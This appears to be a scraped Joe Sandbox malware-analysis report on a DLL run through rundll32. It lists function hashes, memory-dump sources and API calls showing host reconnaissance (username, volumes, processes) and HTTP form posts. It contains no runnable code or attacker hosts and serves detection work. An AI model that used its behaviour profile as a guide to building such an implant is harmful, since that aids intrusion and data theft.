Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: AdaptersInfo$AllocateMemoryVirtual
String ID: o
API String ID: 2718687846-252678980
Opcode ID: 13195bdf0bb6a59d94c018a0841dea2ee7fca6d4c6a805ffbd21c81ec795536a
Instruction ID: ad26d22b11623611f5072ffa8344829d2848eab03d71b66809bf92cc5172373f
Opcode Fuzzy Hash: 13195bdf0bb6a59d94c018a0841dea2ee7fca6d4c6a805ffbd21c81ec795536a
Instruction Fuzzy Hash: A6111FB6908B41C6D7709B20E0883AAB7E1F7887A8F541235E6CD46B68DF7CD684CF04

Function 00007FFB1C81B1D4 Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90f3b0c131f632c7cd4ed2f961d207eb86d46f14186625d359e785690b4c6d7e
Instruction ID: 4e574648e8d0e9610a3e35d25c4bd8dcfc98ebfc64748d8105f9d22f5d675b67
Opcode Fuzzy Hash: 90f3b0c131f632c7cd4ed2f961d207eb86d46f14186625d359e785690b4c6d7e
Instruction Fuzzy Hash: 77410DF2619A81C9D750DB25E4847BEA7E1FB84794F606035EA8E83B69DF3CD445CB00

Function 00007FFB1C81A350 Relevance: 4.6, APIs: 3, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: DirectorySystem
String ID:
API String ID: 2188284642-0
Opcode ID: e51b0eb4244eca9b40c6a37145ddddca8cb203ca42d873ec74cfc419f2d178c7
Instruction ID: c1e769cc0868db1b60916ff06ae16d7ec207c9532c6770ac4bae281612c0483b
Opcode Fuzzy Hash: e51b0eb4244eca9b40c6a37145ddddca8cb203ca42d873ec74cfc419f2d178c7
Instruction Fuzzy Hash: 4931FDE191CE82C9E6609B31E4CD3FAA3E6FB84374F601235E69E826D9DF2CD505C600

Function 00007FFB1C81AD34 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

Strings

@, xrefs: 00007FFB1C81AD46

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: @
API String ID: 2167126740-2766056989
Opcode ID: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
Instruction ID: ef572c6374451c18aafc5cb50b552a496c5f50425c7fc921553fc13f347ad5f3
Opcode Fuzzy Hash: 1bc704fd273e58d77e85457f0012f42626ceed0c4d95ff0d4dbaf88ef569351a
Instruction Fuzzy Hash: 2BE012B2528A8086D6409F24E45579AB761FB847B4F502311F6A946AD8CF7CC1148B00

Function 00007FFB1C8179C8 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFileInitStringUnicode
String ID:
API String ID: 2498367268-0
Opcode ID: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
Instruction ID: bdf6e8e16cd9c3f048f429dff030b00beecd6e95d07d23912f31142ed9a48e2d
Opcode Fuzzy Hash: b656561e30d1fd1fc609a6f2f889e1297561c276a586ec00a0fee1a63f198b42
Instruction Fuzzy Hash: 87011BB2608941C6D630EB25E48416AA7E1F789798F601135EA8D83A59CF2DD6418F00

Function 00007FFB1C81378C Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL ref: 00007FFB1C8137F6

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 8026c00e5c50a70795779a5455b93cc453d36c3d9fc0f045749414a97d51ca7f
Instruction ID: 8547d94b38be38b21d60de2719c6e553eb536e0d7917bf306e6e93b845d22244
Opcode Fuzzy Hash: 8026c00e5c50a70795779a5455b93cc453d36c3d9fc0f045749414a97d51ca7f
Instruction Fuzzy Hash: DCF044F151CA41C9E7709B20E4887BA67A1FB847B8F601734F6AD46AD9CF3DD2458B00

Function 00007FFB1C817B40 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtFreeVirtualMemory.NTDLL ref: 00007FFB1C817B71

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeMemoryVirtual
String ID:
API String ID: 3963845541-0
Opcode ID: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
Instruction ID: 434c683502f98792e6cdc00cbc9f51c0ef18655964abe633e911aea267763e2b
Opcode Fuzzy Hash: 05855a3fed8d404054af5e3eef5cf0d9a8da3070589f551744240206e39a9f46
Instruction Fuzzy Hash: 50E0E6B1508E8191D7609F60E4487997771F785374FA44325EBB941AE4CF7CC24ACF01

Function 00007FFB1C81C934 Relevance: 1.5, APIs: 1, Instructions: 11nativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL ref: 00007FFB1C81C956

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 59eb6cab38d5ab3a285350ec58574edb8211473a9c8413bbadbb0b9e4aa9da1f
Instruction ID: f32f9425a6aa2b27a29cca9a86fae9545b10102f4b298e1a913f8e79c5a496d0
Opcode Fuzzy Hash: 59eb6cab38d5ab3a285350ec58574edb8211473a9c8413bbadbb0b9e4aa9da1f
Instruction Fuzzy Hash: ABD0C7B2A1868197CB245F24E44905A77A1FB95304FD04529E68D45754DF3CD525CF04

Function 00007FFB1C815750 Relevance: 11.0, APIs: 7, Instructions: 467
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00007FFB1C815BB7
wsprintfA.USER32 ref: 00007FFB1C815CA6
wsprintfA.USER32 ref: 00007FFB1C815DCD
new[].LIBCPMTD ref: 00007FFB1C815E75

Part of subcall function 00007FFB1C814D20: InternetCloseHandle.WININET ref: 00007FFB1C814F33
Part of subcall function 00007FFB1C814D20: InternetCloseHandle.WININET ref: 00007FFB1C814F46

new[].LIBCPMTD ref: 00007FFB1C815FA3
GetExitCodeThread.KERNEL32 ref: 00007FFB1C8161C3
GetExitCodeThread.KERNEL32 ref: 00007FFB1C8161FC

Part of subcall function 00007FFB1C81AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: wsprintf$CloseCodeExitHandleInternetThreadnew[]$AllocateMemoryVirtual
String ID:
API String ID: 511820185-0
Opcode ID: 8ac5d10f5c4be1f39c332322c31a8ce84f66ac12bee2500c0bc3922722ddae2f
Instruction ID: c6c17eb7c74fc6627e2b637d6e1151accfa05beb46e4cce65ed25e2356e0619a
Opcode Fuzzy Hash: 8ac5d10f5c4be1f39c332322c31a8ce84f66ac12bee2500c0bc3922722ddae2f
Instruction Fuzzy Hash: 1B52B8F190DE86C9E7708B24E4883FAB6E2FB84364F205135D68D86AA5DF7CE445CB00

Function 00007FFB1C815030 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HttpOpenRequestA.WININET ref: 00007FFB1C815168
HttpOpenRequestA.WININET ref: 00007FFB1C8151E8
InternetSetOptionA.WININET ref: 00007FFB1C815227
HttpSendRequestA.WININET ref: 00007FFB1C815273
HttpSendRequestA.WININET ref: 00007FFB1C815294

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 00007FFB1C8150BC, 00007FFB1C815248, 00007FFB1C815267

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpRequest$OpenSend$InternetOption
String ID: Content-Type: application/x-www-form-urlencoded
API String ID: 664753792-457374458
Opcode ID: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
Instruction ID: 9518b484e937574f5a2890dab61873d89d3e15ce0e85fa296208f2698ec7ccac
Opcode Fuzzy Hash: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
Instruction Fuzzy Hash: 0761D8F690DB81C9E7608B24F4883EAB7A2F794754F601035E68D42A68DF7DD544CB40

Function 00007FFB1C813868 Relevance: 7.6, APIs: 5, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541ab72dd635451082995b8613512323543e8198801155409134fa54fb96020a
Instruction ID: 9035cefd315ab5247aefcf5ce15f0b85b1b25702da164d9777979ee66d2e97de
Opcode Fuzzy Hash: 541ab72dd635451082995b8613512323543e8198801155409134fa54fb96020a
Instruction Fuzzy Hash: 8841E8E090CE42CEFA605B74E48D3F962D3AF45B78F702635E5AE866D5DF2CE4058A01

Function 00007FFB1C818820 Relevance: 6.0, APIs: 4, Instructions: 28
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FFB1C818836
Process32FirstW.KERNEL32 ref: 00007FFB1C818862
Process32NextW.KERNEL32 ref: 00007FFB1C818880
FindCloseChangeNotification.KERNEL32 ref: 00007FFB1C81888F

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
Instruction ID: e754435095474fa9deef6be2f949832fc823fb004156639f812eefea394e9ad9
Opcode Fuzzy Hash: 2dc8fd6175d5f81b5a57fe4cd961050eae0e2aeff7595481171681c6ca23b914
Instruction Fuzzy Hash: DE0121B2A18A41C6E7B0CF20E48C37AB3A2FBC4758F541231E58D82A68DF3CD506CB00

Function 00007FFB1C81B0C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlpNtOpenKey.NTDLL ref: 00007FFB1C81B136

Strings

@, xrefs: 00007FFB1C81B110
0, xrefs: 00007FFB1C81B108

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenRtlp
String ID: 0$@
API String ID: 2893929204-1545510068
Opcode ID: 99056d26cda8ca3d4e3c89b7d0603f3ace301f699dcb2688138bdbb85deba410
Instruction ID: 09ab14a63faf7baf01c864343de7858476c691b3e24157e58bab9dd63532bef5
Opcode Fuzzy Hash: 99056d26cda8ca3d4e3c89b7d0603f3ace301f699dcb2688138bdbb85deba410
Instruction Fuzzy Hash: 0F012CF2618A81CAD760DF20E4843ABB7A5F7843A4FA05135E68D82A69DF7CC555CF40

Function 00007FFB1C818AE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00007FFB1C818B08
wsprintfA.USER32 ref: 00007FFB1C818B25

Strings

frontdesk, xrefs: 00007FFB1C818B1E, 00007FFB1C818B2B

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: NameUserwsprintf
String ID: frontdesk
API String ID: 54179028-1081972030
Opcode ID: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
Instruction ID: 37f7de13950a7fa4f50d5af8a21784b2b116961660802afea95d109b566e4bd1
Opcode Fuzzy Hash: 00ea61a6f36f2d287cf2ddfa281af9f578b78246b28b81e2290f27616a54ea60
Instruction Fuzzy Hash: E4F098F1A2898396EA50AF20E8893F96363FB80754FD01031E14D46595DF6CE65ADB40

Function 00007FFB1C8189D4 Relevance: 4.5, APIs: 3, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstVolumeW.KERNEL32 ref: 00007FFB1C818A0E
GetVolumeInformationW.KERNEL32 ref: 00007FFB1C818A62
FindVolumeClose.KERNEL32 ref: 00007FFB1C818A71

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: Volume$Find$CloseFirstInformation
String ID:
API String ID: 586543143-0
Opcode ID: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
Instruction ID: c2db2af98e57c998f7995b0ed56f6e6bde8b8e52a2091ff361b565743f322bc8
Opcode Fuzzy Hash: f8471610ee8cd183a9485870a89c6ee0d7cca4bc8c0aade8722fc7fa7e06f6f6
Instruction Fuzzy Hash: 6E11DAB1518A41D6E7609B20F4883FAB3A2F785360FA40236E29D42AA8DF3CD559CB00

Function 00007FFB1C8152C4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFB1C81AD34: NtAllocateVirtualMemory.NTDLL ref: 00007FFB1C81AD6A

InternetCrackUrlA.WININET ref: 00007FFB1C81538A

Part of subcall function 00007FFB1C817B40: NtFreeVirtualMemory.NTDLL ref: 00007FFB1C817B71

Strings

h, xrefs: 00007FFB1C81530F

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$AllocateCrackFreeInternet
String ID: h
API String ID: 3448157997-2439710439
Opcode ID: 0f96a828715db361c3cf63272a53f74c9ab47edebcf9e5cc9c7d4e07a2834f5c
Instruction ID: d766aa1afbc62a98b4f9b1587b905830bad9ef2b370108f45a731a0a70e30055
Opcode Fuzzy Hash: 0f96a828715db361c3cf63272a53f74c9ab47edebcf9e5cc9c7d4e07a2834f5c
Instruction Fuzzy Hash: CD31B2B6619B84CAD760DF25E4947AAB3A1F7C8B54F504225EA8D83B99CF3CC504CF00

Function 00007FFB1C814D20 Relevance: 3.1, APIs: 2, Instructions: 114networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFB1C8152C4: InternetCrackUrlA.WININET ref: 00007FFB1C81538A

InternetCloseHandle.WININET ref: 00007FFB1C814F33
InternetCloseHandle.WININET ref: 00007FFB1C814F46

Part of subcall function 00007FFB1C815030: HttpOpenRequestA.WININET ref: 00007FFB1C815168

Part of subcall function 00007FFB1C817B40: NtFreeVirtualMemory.NTDLL ref: 00007FFB1C817B71

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$CrackFreeHttpMemoryOpenRequestVirtual
String ID:
API String ID: 125755524-0
Opcode ID: 05acc83d97d48f0ba9840e5df3ad9815127f8235e43ee1c8653a9ef429597d62
Instruction ID: c062120a170576115efe1079133e8eb7c45531059fcf1cbbf7c9cc85732a7f28
Opcode Fuzzy Hash: 05acc83d97d48f0ba9840e5df3ad9815127f8235e43ee1c8653a9ef429597d62
Instruction Fuzzy Hash: 6651DAB251DE81C5E660DB24F4943BAB7E2FBC43A4F606035E68D82AA9DF7CD444CB40

Function 00007FFB1C814C70 Relevance: 3.0, APIs: 2, Instructions: 36networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FFB1C814CB0
InternetConnectA.WININET ref: 00007FFB1C814CFA

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559323894.00007FFB1C81F000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559502791.00007FFB1C820000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559661040.00007FFB1C822000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffb1c810000_rundll32.jbxd

Yara matches

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: 0fe91170214488c1f31aaa1ce2ab234376f6321324653d804dedd54fde8ae1f3
Instruction ID: aa3c3bc7aebfdd819f1ca6576caa4b34024dd3700e676ad90dcb2b8245c3394f
Opcode Fuzzy Hash: 0fe91170214488c1f31aaa1ce2ab234376f6321324653d804dedd54fde8ae1f3
Instruction Fuzzy Hash: AF11E8B291CF81C6E7608F28F49876BB6B1F7C5798F201125E7C946A68DF7DD0548B00

Function 00007FFB1C81CF14 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2559163401.00007FFB1C811000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFB1C810000, based on PE: true

Associated: 00000006.00000002.2559115005.00007FFB1C810000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.2559191844.00007FFB1C81E000.00000002.00000001.01000000.00000005.sdmpDownload File
